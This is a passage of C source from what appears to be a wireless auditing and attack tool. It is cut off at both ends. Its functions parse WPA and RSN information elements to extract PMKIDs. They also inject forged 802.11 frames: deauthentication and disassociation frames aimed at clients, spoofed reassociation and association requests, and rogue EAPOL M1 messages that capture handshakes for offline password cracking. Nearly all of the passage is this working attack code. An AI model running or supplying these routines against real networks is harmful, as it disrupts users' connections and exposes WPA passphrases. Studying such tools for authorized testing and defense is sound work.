wpatype = byte_swap_16(wpaptr->type); #endif if(wpatype != VT_WPA_IE) return; zeiger->kdversion |= KV_WPAIE; gsuiteptr = (suite_t*)ieptr; if(memcmp(gsuiteptr->oui, &ouimscorp, 3) == 0) { if(gsuiteptr->type == CS_WEP40) zeiger->groupcipher |= TCS_WEP40; if(gsuiteptr->type == CS_TKIP) zeiger->groupcipher |= TCS_TKIP; if(gsuiteptr->type == CS_WRAP) zeiger->groupcipher |= TCS_WRAP; if(gsuiteptr->type == CS_CCMP) zeiger->groupcipher |= TCS_CCMP; if(gsuiteptr->type == CS_WEP104) zeiger->groupcipher |= TCS_WEP104; if(gsuiteptr->type == CS_BIP) zeiger->groupcipher |= TCS_BIP; if(gsuiteptr->type == CS_NOT_ALLOWED) zeiger->groupcipher |= TCS_NOT_ALLOWED; } wpalen -= SUITE_SIZE; ieptr += SUITE_SIZE; csuitecountptr = (suitecount_t*)ieptr; wpalen -= SUITECOUNT_SIZE; ieptr += SUITECOUNT_SIZE; #ifndef BIG_ENDIAN_HOST csuitecount = csuitecountptr->count; #else csuitecount = byte_swap_16(csuitecountptr->count); #endif for(c = 0; c < csuitecount; c++) { csuiteptr = (suite_t*)ieptr; if(memcmp(csuiteptr->oui, &ouimscorp, 3) == 0) { if(csuiteptr->type == CS_WEP40) zeiger->cipher |= TCS_WEP40; if(csuiteptr->type == CS_TKIP) zeiger->cipher |= TCS_TKIP; if(csuiteptr->type == CS_WRAP) zeiger->cipher |= TCS_WRAP; if(csuiteptr->type == CS_CCMP) zeiger->cipher |= TCS_CCMP; if(csuiteptr->type == CS_WEP104) zeiger->cipher |= TCS_WEP104; if(csuiteptr->type == CS_BIP) zeiger->cipher |= TCS_BIP; if(csuiteptr->type == CS_NOT_ALLOWED) zeiger->cipher |= TCS_NOT_ALLOWED; } wpalen -= SUITE_SIZE; ieptr += SUITE_SIZE; if(wpalen <= 0) return; } asuitecountptr = (suitecount_t*)ieptr; wpalen -= SUITECOUNT_SIZE; ieptr += SUITECOUNT_SIZE; #ifndef BIG_ENDIAN_HOST asuitecount = asuitecountptr->count; #else asuitecount = byte_swap_16(asuitecountptr->count); #endif for(c = 0; c < asuitecount; c++) { asuiteptr = (suite_t*)ieptr; if(memcmp(asuiteptr->oui, &ouimscorp, 3) == 0) { if(asuiteptr->type == AK_PMKSA) zeiger->akm |= TAK_PMKSA; if(asuiteptr->type == AK_PSK) zeiger->akm |= TAK_PSK; if(asuiteptr->type == AK_FT) zeiger->akm |= TAK_FT; if(asuiteptr->type == AK_FT_PSK) zeiger->akm |= TAK_FT_PSK; if(asuiteptr->type == AK_PMKSA256) zeiger->akm |= TAK_PMKSA256; if(asuiteptr->type == AK_PSKSHA256) zeiger->akm |= TAK_PSKSHA256; if(asuiteptr->type == AK_TDLS) zeiger->akm |= TAK_TDLS; if(asuiteptr->type == AK_SAE_SHA256) zeiger->akm |= TAK_SAE_SHA256; if(asuiteptr->type == AK_FT_SAE) zeiger->akm |= TAK_FT_SAE; } wpalen -= SUITE_SIZE; ieptr += SUITE_SIZE; if(wpalen <= 0) return; } return; } /*===========================================================================*/ static inline void gettagvendor(int vendorlen, uint8_t *ieptr, tags_t *zeiger) { static wpaie_t *wpaptr; wpaptr = (wpaie_t*)ieptr; if(memcmp(wpaptr->oui, &ouimscorp, 3) != 0) return; if((wpaptr->ouitype == VT_WPA_IE) && (vendorlen >= WPAIE_LEN_MIN)) gettagwpa(vendorlen, ieptr, zeiger); return; } /*===========================================================================*/ static inline void gettagrsn(int rsnlen, uint8_t *ieptr, tags_t *zeiger) { static int c; static rsnie_t *rsnptr; static int rsnver; static suite_t *gsuiteptr; static suitecount_t *csuitecountptr; static suite_t *csuiteptr; static int csuitecount; static suitecount_t *asuitecountptr; static suite_t *asuiteptr; static int asuitecount; static rsnpmkidlist_t *rsnpmkidlistptr; static int rsnpmkidcount; rsnptr = (rsnie_t*)ieptr; #ifndef BIG_ENDIAN_HOST rsnver = rsnptr->version; #else rsnver = byte_swap_16(rsnptr->version); #endif if(rsnver != 1) return; zeiger->kdversion |= KV_RSNIE; rsnlen -= RSNIE_SIZE; ieptr += RSNIE_SIZE; gsuiteptr = (suite_t*)ieptr; if(memcmp(gsuiteptr->oui, &suiteoui, 3) == 0) { if(gsuiteptr->type == CS_WEP40) zeiger->groupcipher |= TCS_WEP40; if(gsuiteptr->type == CS_TKIP) zeiger->groupcipher |= TCS_TKIP; if(gsuiteptr->type == CS_WRAP) zeiger->groupcipher |= TCS_WRAP; if(gsuiteptr->type == CS_CCMP) zeiger->groupcipher |= TCS_CCMP; if(gsuiteptr->type == CS_WEP104) zeiger->groupcipher |= TCS_WEP104; if(gsuiteptr->type == CS_BIP) zeiger->groupcipher |= TCS_BIP; if(gsuiteptr->type == CS_NOT_ALLOWED) zeiger->groupcipher |= TCS_NOT_ALLOWED; } rsnlen -= SUITE_SIZE; ieptr += SUITE_SIZE; csuitecountptr = (suitecount_t*)ieptr; rsnlen -= SUITECOUNT_SIZE; ieptr += SUITECOUNT_SIZE; #ifndef BIG_ENDIAN_HOST csuitecount = csuitecountptr->count; #else csuitecount = byte_swap_16(csuitecountptr->count); #endif for(c = 0; c < csuitecount; c++) { csuiteptr = (suite_t*)ieptr; if(memcmp(csuiteptr->oui, &suiteoui, 3) == 0) { if(csuiteptr->type == CS_WEP40) zeiger->cipher |= TCS_WEP40; if(csuiteptr->type == CS_TKIP) zeiger->cipher |= TCS_TKIP; if(csuiteptr->type == CS_WRAP) zeiger->cipher |= TCS_WRAP; if(csuiteptr->type == CS_CCMP) zeiger->cipher |= TCS_CCMP; if(csuiteptr->type == CS_WEP104) zeiger->cipher |= TCS_WEP104; if(csuiteptr->type == CS_BIP) zeiger->cipher |= TCS_BIP; if(csuiteptr->type == CS_NOT_ALLOWED) zeiger->cipher |= TCS_NOT_ALLOWED; } rsnlen -= SUITE_SIZE; ieptr += SUITE_SIZE; if(rsnlen <= 0) return; } asuitecountptr = (suitecount_t*)ieptr; rsnlen -= SUITECOUNT_SIZE; ieptr += SUITECOUNT_SIZE; #ifndef BIG_ENDIAN_HOST asuitecount = asuitecountptr->count; #else asuitecount = byte_swap_16(asuitecountptr->count); #endif for(c = 0; c < asuitecount; c++) { asuiteptr = (suite_t*)ieptr; if(memcmp(asuiteptr->oui, &suiteoui, 3) == 0) { if(asuiteptr->type == AK_PMKSA) zeiger->akm |= TAK_PMKSA; if(asuiteptr->type == AK_PSK) zeiger->akm |= TAK_PSK; if(asuiteptr->type == AK_FT) zeiger->akm |= TAK_FT; if(asuiteptr->type == AK_FT_PSK) zeiger->akm |= TAK_FT_PSK; if(asuiteptr->type == AK_PMKSA256) zeiger->akm |= TAK_PMKSA256; if(asuiteptr->type == AK_PSKSHA256) zeiger->akm |= TAK_PSKSHA256; if(asuiteptr->type == AK_TDLS) zeiger->akm |= TAK_TDLS; if(asuiteptr->type == AK_SAE_SHA256) zeiger->akm |= TAK_SAE_SHA256; if(asuiteptr->type == AK_FT_SAE) zeiger->akm |= TAK_FT_SAE; } rsnlen -= SUITE_SIZE; ieptr += SUITE_SIZE; if(rsnlen <= 0) return; } rsnlen -= RSNCAPABILITIES_SIZE; ieptr += RSNCAPABILITIES_SIZE; if(rsnlen <= 0) return; rsnpmkidlistptr = (rsnpmkidlist_t*)ieptr; #ifndef BIG_ENDIAN_HOST rsnpmkidcount = rsnpmkidlistptr->count; #else rsnpmkidcount = byte_swap_16(rsnpmkidlistptr->count); #endif if(rsnpmkidcount == 0) return; rsnlen -= RSNPMKIDLIST_SIZE; ieptr += RSNPMKIDLIST_SIZE; if(rsnlen < 16) return; if(((zeiger->akm &TAK_PSK) == TAK_PSK) || ((zeiger->akm &TAK_PSKSHA256) == TAK_PSKSHA256)) memcpy(zeiger->pmkid, ieptr, 16); return; } /*===========================================================================*/ static inline void gettags(int infolen, uint8_t *infoptr, tags_t *zeiger) { static ietag_t *tagptr; memset(zeiger, 0, TAGS_SIZE); while(0 < infolen) { if(infolen == 4) return; tagptr = (ietag_t*)infoptr; if(tagptr->len == 0) { infoptr += tagptr->len +IETAG_SIZE; infolen -= tagptr->len +IETAG_SIZE; continue; } if(tagptr->len > infolen) return; if(tagptr->id == TAG_SSID) { if((tagptr->len > 0) && (tagptr->len <= ESSID_LEN_MAX)) { memcpy(zeiger->essid, &tagptr->data[0], tagptr->len); zeiger->essidlen = tagptr->len; } } else if(tagptr->id == TAG_CHAN) { if(tagptr->len == 1) zeiger->channel = tagptr->data[0]; } else if(tagptr->id == TAG_RSN) { if(tagptr->len >= RSNIE_LEN_MIN) gettagrsn(tagptr->len, tagptr->data, zeiger); } else if(tagptr->id == TAG_VENDOR) { if(tagptr->len >= VENDORIE_SIZE) gettagvendor(tagptr->len, tagptr->data, zeiger); } infoptr += tagptr->len +IETAG_SIZE; infolen -= tagptr->len +IETAG_SIZE; } return; } /*===========================================================================*/ static inline int gettlvoffset_value(uint8_t tag, uint8_t *tlvoctets, size_t tlvoctetslen) { size_t pos = 0; while(pos < tlvoctetslen) { if(tlvoctets[pos] == tag) return pos +2; else pos += tlvoctets[pos +1] +2; } return 0; } /*===========================================================================*/ static inline int bin2ieset(ietag_t *ieset[], uint8_t *tlvoctets, size_t tlvoctetslen) { size_t octet = 0; size_t setcnt = 0; if(tlvoctetslen == 0) return 0; while(octet < tlvoctetslen -1) { ieset[setcnt] = (ietag_t*)(&tlvoctets[octet]); if(ieset[setcnt]->len > (tlvoctetslen -octet -2)) break; octet += ieset[setcnt]->len +2; setcnt++; if(setcnt == IESETLEN_MAX) break; } return setcnt; } /*===========================================================================*/ static inline size_t merge_ieset2bin(uint8_t *destdata, size_t destdatalenmax, const uint8_t *mergedata, size_t mergedatalen, ietag_t *ieset[], size_t iesetlen) { size_t setcnt, pos = 0; size_t destdatalen = 0; bool mergedtags[IESETLEN_MAX] = { 0 }; while(pos < (mergedatalen -1)) { for(setcnt = 0; setcnt < iesetlen; setcnt++) { if((ieset[setcnt]->id > 0) && (ieset[setcnt]->id == mergedata[pos])) { if(destdatalen > destdatalenmax -ieset[setcnt]->len -2) break; memcpy(&destdata[destdatalen], ieset[setcnt], ieset[setcnt]->len +2); destdatalen += ieset[setcnt]->len +2; mergedtags[setcnt] = true; break; } } if(setcnt == iesetlen) { if(destdatalen > destdatalenmax -mergedata[pos +1] -2) break; memcpy(&destdata[destdatalen], &mergedata[pos], mergedata[pos +1] +2); destdatalen += mergedata[pos +1] +2; } pos += mergedata[pos +1] +2; } for(setcnt = 0; setcnt < iesetlen; setcnt++) { if(ieset[setcnt]->id > 0 && mergedtags[setcnt] == false) { if(destdatalen > destdatalenmax -ieset[setcnt]->len -2) break; memcpy(&destdata[destdatalen], ieset[setcnt], ieset[setcnt]->len +2); destdatalen += ieset[setcnt]->len +2; } } return destdatalen; } /*===========================================================================*/ static inline void send_packet(int txsocket, int txsize, char *errormessage) { static int fdnum; static fd_set txfds; static struct timespec tsfdtx; static char timestring[16]; tsfdtx.tv_sec = 0; tsfdtx.tv_nsec = FDNSECTXTIMER; FD_ZERO(&txfds); FD_SET(txsocket, &txfds); fdnum = pselect(txsocket +1, NULL, &txfds, NULL, &tsfdtx, NULL); if(fdnum < 0) { errorcount++; return; } if(FD_ISSET(txsocket, &txfds)) { if(txsize != write(txsocket, packetoutptr, txsize)) { strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); fprintf(stdout, "%s %d/%d socket error: %s\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, errormessage); errorcount++; return; } fsync(txsocket); outgoingcount++; return; } strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); fprintf(stdout, "%s %d/%d driver is busy: %s\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, errormessage); return; } /*===========================================================================*/ static inline void send_disassociation(uint8_t *macsta, uint8_t *macap, uint8_t reason) { static mac_t *macftx; packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +2 +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_DISASSOC; memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); macftx->duration = 0x013a; macftx->sequence = mydisassociationsequence++ << 4; if(mydisassociationsequence >= 4096) mydisassociationsequence = 1; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM] = reason; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +2, "failed to transmit deauthentication"); return; } /*===========================================================================*/ static void send_deauthentication2client(uint8_t *client, uint8_t *ap, uint8_t reason) { static mac_t *macftx; packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +2 +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_DEAUTH; memcpy(macftx->addr1, client, 6); memcpy(macftx->addr2, ap, 6); memcpy(macftx->addr3, ap, 6); macftx->duration = 0x013a; macftx->sequence = mydeauthenticationsequence++ << 4; if(mydeauthenticationsequence >= 4096) mydeauthenticationsequence = 1; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM] = reason; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +2, "failed to transmit deauthentication"); return; } /*===========================================================================*/ static inline void send_reassociation_req_wpa1(macessidlist_t *zeiger) { static mac_t *macftx; static capreqsta_t *stacapa; static const uint8_t reassociationrequestwpa1data[] = { /* supported rates */ 0x01, 0x08, 0x02, 0x04, 0x0b, 0x16, 0x0c, 0x12, 0x18, 0x24, /* extended supported rates */ 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, /* power Capability */ 0x21, 0x02, 0x04, 0x14, /* vendor specific */ 0xdd, 0x08, 0xac, 0x85, 0x3d, 0x82, 0x01, 0x00, 0x00, 0x00, /* WPA information (WPA1) */ 0xdd, 0x16, 0x00, 0x50, 0xf2, 0x01, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, /* group cipher */ 0x01, 0x00, /* count */ 0x00, 0x50, 0xf2, 0x02, /* pairwise cipher */ 0x01, 0x00, /* count */ 0x00, 0x50, 0xf2, 0x02, /* AKM */ }; #define REASSOCIATIONREQUESTWPA1_SIZE sizeof(reassociationrequestwpa1data) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +REASSOCIATIONREQUESTWPA1_SIZE +IETAG_SIZE +zeiger->essidlen); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_REASSOC_REQ; memcpy(macftx->addr1, zeiger->ap, 6); memcpy(macftx->addr2, zeiger->client, 6); memcpy(macftx->addr3, zeiger->ap, 6); macftx->duration = 0x013a; macftx->sequence = myclientsequence++ << 4; if(myclientsequence >= 4096) myclientsequence = 1; stacapa = (capreqsta_t *) (packetoutptr +HDRRT_SIZE +MAC_SIZE_NORM); stacapa->capabilities = 0x0411; stacapa->listeninterval = 3; memcpy(stacapa->addr, zeiger->ap, 6); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +1] = zeiger->essidlen; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +IETAG_SIZE], zeiger->essid, zeiger->essidlen); memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +zeiger->essidlen +IETAG_SIZE], &reassociationrequestwpa1data, REASSOCIATIONREQUESTWPA1_SIZE); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +zeiger->essidlen +IETAG_SIZE +0x29] = CS_TKIP; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +zeiger->essidlen +IETAG_SIZE +0x2f] = CS_TKIP; if((zeiger->akm &TAK_PSK) == TAK_PSK) packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +zeiger->essidlen +IETAG_SIZE +0x35] = AK_PSK; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +zeiger->essidlen +IETAG_SIZE +REASSOCIATIONREQUESTWPA1_SIZE, "failed to transmit reassociationrequest"); return; } /*===========================================================================*/ static inline void send_reassociation_req_wpa2(macessidlist_t *zeiger) { static mac_t *macftx; static capreqsta_t *stacapa; static const uint8_t reassociationrequestwpa2data[] = { /* supported rates */ 0x01, 0x08, 0x02, 0x04, 0x0b, 0x16, 0x0c, 0x12, 0x18, 0x24, /* extended supported rates */ 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, /* power Capability */ 0x21, 0x02, 0x04, 0x14, /* vendor specific */ 0xdd, 0x08, 0xac, 0x85, 0x3d, 0x82, 0x01, 0x00, 0x00, 0x00, /* RSN information AES PSK (WPA2) */ 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, /* group cipher */ 0x01, 0x00, /* count */ 0x00, 0x0f, 0xac, 0x02, /* pairwise cipher */ 0x01, 0x00, /* count */ 0x00, 0x0f, 0xac, 0x02, /* AKM */ 0x00, 0x00, }; #define REASSOCIATIONREQUESTWPA2_SIZE sizeof(reassociationrequestwpa2data) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +REASSOCIATIONREQUESTWPA2_SIZE +IETAG_SIZE +zeiger->essidlen); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_REASSOC_REQ; memcpy(macftx->addr1, zeiger->ap, 6); memcpy(macftx->addr2, zeiger->client, 6); memcpy(macftx->addr3, zeiger->ap, 6); macftx->duration = 0x013a; macftx->sequence = myclientsequence++ << 4; if(myclientsequence >= 4096) myclientsequence = 1; stacapa = (capreqsta_t *) (packetoutptr +HDRRT_SIZE +MAC_SIZE_NORM); stacapa->capabilities = 0x0411; stacapa->listeninterval = 3; memcpy(stacapa->addr, zeiger->ap, 6); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +1] = zeiger->essidlen; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +IETAG_SIZE], zeiger->essid, zeiger->essidlen); memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +zeiger->essidlen +IETAG_SIZE], &reassociationrequestwpa2data, REASSOCIATIONREQUESTWPA2_SIZE); if((zeiger->groupcipher &TCS_CCMP) == TCS_CCMP) packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +zeiger->essidlen +IETAG_SIZE +0x25] = CS_CCMP; else packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +zeiger->essidlen +IETAG_SIZE +0x25] = CS_TKIP; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +zeiger->essidlen +IETAG_SIZE +0x2b] = CS_CCMP; if((zeiger->akm &TAK_PSK) == TAK_PSK) packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +zeiger->essidlen +IETAG_SIZE +0x31] = AK_PSK; else packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +zeiger->essidlen +IETAG_SIZE +0x31] = AK_PSKSHA256; send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESREQSTA_SIZE +zeiger->essidlen +IETAG_SIZE +REASSOCIATIONREQUESTWPA2_SIZE, "failed to transmit reassociationrequest"); return; } /*===========================================================================*/ static inline void send_ack() { static mac_t *macftx; packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_ACK+1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_CTL; macftx->subtype = IEEE80211_STYPE_ACK; memcpy(macftx->addr1, macfrx->addr2, 6); send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_ACK, "failed to transmit acknowledgement"); return; } /*===========================================================================*/ static inline void send_reassociation_resp() { static mac_t *macftx; static const uint8_t reassociationresponsedata[] = { /* Fixed parameters (6 bytes) Fixed parameters (6 bytes) */ 0x11, 0x04, 0x00, 0x00, 0x01, 0xc0, /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6, 9, 12, 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24, /* Tag: Extended Supported Rates 24, 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, /* Tag: Extended Capabilities (8 octets) */ 0x7f, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40 }; #define REASSOCIATIONRESPONSE_SIZE sizeof(reassociationresponsedata) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +REASSOCIATIONRESPONSE_SIZE +1); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_REASSOC_RESP; memcpy(macftx->addr1, macfrx->addr2, 6); memcpy(macftx->addr2, macfrx->addr1, 6); memcpy(macftx->addr3, macfrx->addr1, 6); macftx->duration = 0x013a; macftx->sequence = myapsequence++ << 4; if(myapsequence >= 4096) myapsequence = 1; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM], &reassociationresponsedata, REASSOCIATIONRESPONSE_SIZE); send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +REASSOCIATIONRESPONSE_SIZE, "failed to transmit associationresponse"); return; } /*===========================================================================*/ static inline void send_m1_wpa2() { static mac_t *macftx; static const uint8_t llcdata[] = { 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x88, 0x8e }; static const uint8_t wpa2data[] = { 0x02, 0x03, 0x00, 0x5f, 0x02, 0x00, 0x8a, 0x00, 0x10, }; #define WPA2_SIZE sizeof(wpa2data) timestamp += 1; packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE +100); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_DATA; macftx->subtype = IEEE80211_STYPE_DATA; memcpy(macftx->addr1, &lastauthclient, 6); memcpy(macftx->addr2, &lastauthap, 6); memcpy(macftx->addr3, &lastauthap, 6); macftx->from_ds = 1; macftx->duration = 0x013a; macftx->sequence = myapsequence++ << 4; if(myapsequence >= 4096) myapsequence = 1; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM], &llcdata, LLC_SIZE); memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE], &wpa2data, WPA2_SIZE); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE +0x0f] = (myrc >> 8) &0xff; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE +0x10] = myrc &0xff; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE +0x11], &myanonce, 32); if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_EAP) == PCAPNG_FRAME_EAP) { packetlenown = HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE +99; writeepbown(fd_pcapng); } } send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE +99, "failed to transmit proberesponse"); lastauthtimestamp = timestamp; return; } /*===========================================================================*/ static inline void send_m1_wpa1() { static mac_t *macftx; static const uint8_t llcdata[] = { 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x88, 0x8e }; static const uint8_t wpa1data[] = { 0x02, 0x03, 0x00, 0x5f, 0x02, 0x00, 0x89, 0x00, 0x20, }; #define WPA1_SIZE sizeof(wpa1data) timestamp += 1; packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE +100); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_DATA; macftx->subtype = IEEE80211_STYPE_DATA; memcpy(macftx->addr1, &lastauthclient, 6); memcpy(macftx->addr2, &lastauthap, 6); memcpy(macftx->addr3, &lastauthap, 6); macftx->from_ds = 1; macftx->duration = 0x013a; macftx->sequence = myapsequence++ << 4; if(myapsequence >= 4096) myapsequence = 1; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM], &llcdata, LLC_SIZE); memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE], &wpa1data, WPA1_SIZE); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE +0x0f] = (myrc >> 8) &0xff; packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE +0x10] = myrc &0xff; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE +0x11], &myanonce, 32); if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_EAP) == PCAPNG_FRAME_EAP) { packetlenown = HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE +99; writeepbown(fd_pcapng); } } send_packet(fd_socket, HDRRT_SIZE +MAC_SIZE_NORM +LLC_SIZE +99, "failed to transmit proberesponse"); lastauthtimestamp = timestamp; return; } /*===========================================================================*/ static inline void send_association_req_wpa2(macessidlist_t *zeiger) { static mac_t *macftx; static const uint8_t associationrequestcapa[] = { 0x31, 0x04, 0x05, 0x00 }; #define ASSOCIATIONREQUESTCAPA_SIZE sizeof(associationrequestcapa) static const uint8_t associationrequestwpa2data[] = { /* supported rates */ 0x01, 0x08, 0x02, 0x04, 0x0b, 0x16, 0x0c, 0x12, 0x18, 0x24, /* extended supported rates */ 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, /* RSN information AES PSK (WPA2) */ 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, /* group cipher */ 0x01, 0x00, /* count */ 0x00, 0x0f, 0xac, 0x02, /* pairwise cipher */ 0x01, 0x00, /* count */ 0x00, 0x0f, 0xac, 0x02, /* AKM */ 0x00, 0x00, /* HT capabilites */ 0x2d, 0x1a, 0x6e, 0x18, 0x1f, 0xff, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x96, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* extended capabilites */ 0x7f, 0x08, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x40, /* supported operating classes */ 0x3b, 0x14, 0x51, 0x51, 0x53, 0x54, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7a, 0x7b, 0x7c, 0x7d, 0x7e, 0x7f, 0x80, 0x81, 0x82, /* WMM/WME */ 0xdd, 0x07, 0x00, 0x50, 0xf2, 0x02, 0x00, 0x01, 0x00 }; #define ASSOCIATIONREQUESTWPA2_SIZE sizeof(associationrequestwpa2data) packetoutptr = epbown +EPB_SIZE; memset(packetoutptr, 0, HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +ASSOCIATIONREQUESTWPA2_SIZE +IETAG_SIZE +zeiger->essidlen); memcpy(packetoutptr, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetoutptr +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_ASSOC_REQ; memcpy(macftx->addr1, zeiger->ap, 6); memcpy(macftx->addr2, &mac_myclient, 6); memcpy(macftx->addr3, zeiger->ap, 6); macftx->duration = 0x013a; macftx->sequence = myclientsequence++ << 4; if(myclientsequence >= 4096) myclientsequence = 1; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM], &associationrequestcapa, ASSOCIATIONREQUESTCAPA_SIZE); packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +1] = zeiger->essidlen; memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +IETAG_SIZE], zeiger->essid, zeiger->essidlen); memcpy(&packetoutptr[HDRRT_SIZE +MAC_SIZE_NORM +ASSOCIATIONREQUESTCAPA_SIZE +zeiger->essidlen +IETAG_SIZE], &associationrequestwpa2data, ASSOCIATIONREQUESTWPA2_SIZE); if((zeiger->groupcipher &TCS_CCMP) == TCS_CCMP) 